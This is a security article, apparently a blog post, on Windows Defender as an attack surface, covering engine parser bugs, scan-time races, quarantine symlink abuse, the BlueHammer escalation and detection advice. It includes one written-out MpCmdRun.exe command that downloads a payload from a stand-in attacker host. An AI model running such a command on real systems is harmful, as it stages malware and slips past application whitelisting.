The Bodyguard Problem: When Windows Defender Becomes the Attack Vector
Source: lobsters
Security software occupies a uniquely dangerous position on any system. To do its job, it needs more access than almost anything else running on the machine: kernel drivers, real-time file system hooks, automatic execution on every file write, and in Windows Defender’s case, a persistent service running as NT AUTHORITY\SYSTEM. That combination of ubiquity, trust, and privilege has made antivirus engines a recurring target for researchers and attackers alike. The BlueHammer zero-day is the latest entry in a long and well-documented series of vulnerabilities that exploit exactly this dynamic.
Why Defender Is Worth Attacking
Windows Defender ships with every modern Windows installation and is active by default. Its core component, MsMpEng.exe, runs the Malware Protection Engine (implemented in mpengine.dll) as a SYSTEM-level service. A kernel-mode driver, WdFilter.sys, sits in the I/O stack to intercept file operations before they reach the filesystem. This means any vulnerability in Defender’s code that processes attacker-controlled input can potentially yield code execution at the highest privilege level on the machine, without requiring the attacker to already have elevated rights.
That attack surface is substantial. mpengine.dll contains parsers for hundreds of file formats, emulators for x86 and JavaScript code (to unpack and detonate potential malware in a sandbox), and heuristics engines that interpret complex data structures. Every one of those parsers is a potential target, and all of them run in the context of a SYSTEM process that also holds a kernel driver.
The Ormandy Benchmark
The most thorough public work on Defender’s attack surface came from Tavis Ormandy at Google Project Zero in 2017. His research uncovered CVE-2017-0290, a critical heap corruption vulnerability in mpengine.dll triggered by malformed PE files. The exploit required no user interaction: because Defender scans incoming email attachments before they are opened, sending a crafted email to a target was sufficient to achieve remote code execution as SYSTEM. No clicks, no prompts, no interaction at all.
Ormandy also documented the NScript interpreter inside Defender, a custom JavaScript-like engine used to analyze potentially malicious scripts. This interpreter, running unsandboxed as SYSTEM, had its own suite of memory safety bugs. The recursive irony is almost too neat: the component designed to safely execute suspicious scripts was itself unsafely executing scripts.
This was not an isolated finding. The security research community has consistently found that AV engines, precisely because they must parse hostile input at high privilege, accumulate vulnerability classes that would be considered unacceptable in any user-facing application.
The TOCTOU Class
Beyond parser bugs, Defender’s scan-on-write behavior creates a structural vulnerability class: time-of-check to time-of-use (TOCTOU) races. When a file is written to disk, WdFilter.sys intercepts the write and triggers a scan by MsMpEng.exe. The scan happens against the file at a point in time. If an attacker can replace the file between when Defender scans it and when the system actually acts on it, the check and the use refer to different data.
This attack pattern was demonstrated concretely in CVE-2021-1647, a Defender RCE that Microsoft patched in January 2021 and confirmed was being actively exploited in the wild at the time of disclosure. The vulnerability was rated CVSS 7.8 and required local access, but in combination with common initial access vectors it gave attackers a reliable privilege escalation path from a low-integrity user process to SYSTEM.
The quarantine mechanism introduces a related problem. When Defender identifies a malicious file, it moves it to a quarantine directory (C:\ProgramData\Microsoft\Windows Defender\Quarantine) using SYSTEM privileges. Several researchers have shown that it is possible to influence where a quarantined file ends up by placing symlinks or junction points in the path. Because the move is performed by a SYSTEM process, an attacker with limited privileges can leverage this to write controlled content to locations that are otherwise inaccessible.
Living Off the Land with MpCmdRun.exe
Separate from privilege escalation is the abuse of Defender as a living-off-the-land binary, or LOLBin. MpCmdRun.exe is the command-line interface to Defender and has a -DownloadFile flag:
MpCmdRun.exe -DownloadFile -url https://attacker.example/payload.exe -path C:\Windows\Temp\payload.exeThis downloads arbitrary content using a signed Microsoft binary, bypassing controls that might flag unusual network activity from unknown processes. It also sidesteps application whitelisting policies that permit Microsoft-signed executables unconditionally. The technique has been observed in post-exploitation frameworks as a reliable way to stage secondary payloads after initial access.
The BlueHammer Context
BlueHammer fits into this established pattern but represents a notable development because it weaponizes the scan engine’s own behavior rather than simply abusing a misconfiguration or a parser bug in isolation. The exploit chain leverages Defender’s privileged file handling to achieve local privilege escalation, turning the protection mechanism into the escalation path. The approach is consistent with a broader shift in offensive security toward trusting what the target trusts: use signed binaries, use installed services, use the AV engine itself.
Microsoft’s patch cadence for Defender is worth noting. Unlike most Windows components, Defender updates ship through Windows Update separately from the main OS patch cycle. Signature updates arrive daily; engine updates follow their own schedule. This means a Defender vulnerability can be patched faster than a kernel vulnerability in some cases, but it also means the patching surface is separate and requires its own tracking. Organizations that disable automatic Defender updates in locked-down environments can unknowingly leave the engine vulnerable for extended periods.
Structural Mitigations and Their Limits
Microsoft has added mitigations to Defender’s architecture over the years. The Protected Process Light (PPL) model is used for some Defender components, limiting which processes can inject into or terminate the service. The emulation sandbox for analyzing suspicious code has been hardened. AMSI (Antimalware Scan Interface) integration provides a more standardized interface for script scanning that reduces the amount of custom interpreter code in the engine.
But none of these address the fundamental tension: Defender must process attacker-controlled input, at high privilege, at scale, on every Windows system in the world. That is an enormous attack surface maintained by a large engineering organization under competitive pressure to add detection capabilities. New file format parsers, new emulation features, and new heuristics all expand the attack surface even as security improvements narrow specific vulnerability classes.
The BYOVD (Bring Your Own Vulnerable Driver) technique is instructive here. Attackers bring a known-vulnerable signed kernel driver onto a target system and exploit it to gain kernel access, bypassing Driver Signature Enforcement. Defender is in some ways the inverse: it is already on the system, already running as SYSTEM, already trusted. No bringing required.
What This Means in Practice
For defenders, the practical implications are straightforward. Keep Defender’s engine updated, not just its signatures. Monitor for unusual use of MpCmdRun.exe, particularly with network flags or in contexts where a user-facing process has no business invoking it. Watch for unexpected writes to the Quarantine directory path or symlinks placed in paths that Defender operates on.
For the broader security community, BlueHammer is a reminder that trust is transitive and that high-privilege components with large attack surfaces will be exploited. Security software is not exempt from security vulnerabilities; in some ways it is more exposed than most software because attacking it is so rewarding. Every parser in mpengine.dll, every emulator in the scan engine, every privileged file operation in the quarantine flow is code that runs against hostile input on millions of machines. The research will keep coming, and the patches will keep following.